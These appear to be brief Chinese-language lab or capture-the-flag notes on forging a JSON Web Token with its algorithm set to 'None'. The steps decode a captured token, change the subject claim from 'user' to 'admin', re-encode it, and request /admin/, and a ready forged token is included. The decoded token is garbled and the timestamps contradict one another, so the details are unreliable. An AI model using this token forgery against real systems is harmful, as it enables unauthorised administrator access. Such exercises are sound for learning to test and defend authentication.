抓包
发送到decoder解码
{"alg":"None","typ":"jwtIn0.[{"iss":"admin","iat":1695184101,"exp":1695191301,"nbf":1695184101,"sub":"user","jti":"65e1de8b9f861e796a1e77ca36f669d6"fV0
- iss: 签发者是admin
- iat/nbf: 签发时间是1695185318
- exp: 过期时间是1695192518
- sub: 面向用户user
- jti: JWT唯一标识符
改sub的值为admin然后直接加密
eyJhbGciOiJOb25lIiwidHlwIjoiand0SW4wLlt7ImlzcyI6ImFkbWluIiwiaWF0IjoxNjk1MTgzNDcwLCJleHAiOjE2OTUxOTA2NzAsIm5iZiI6MTY5NTE4MzQ3MCwic3ViIjoiYWRtaW4iLCJqdGkiOiI4MWM0NzUwYTU0OTljOTZjYWVkNTgzZWE5MjcyZmJlZCJmVjA=
用这个发包访问/admin/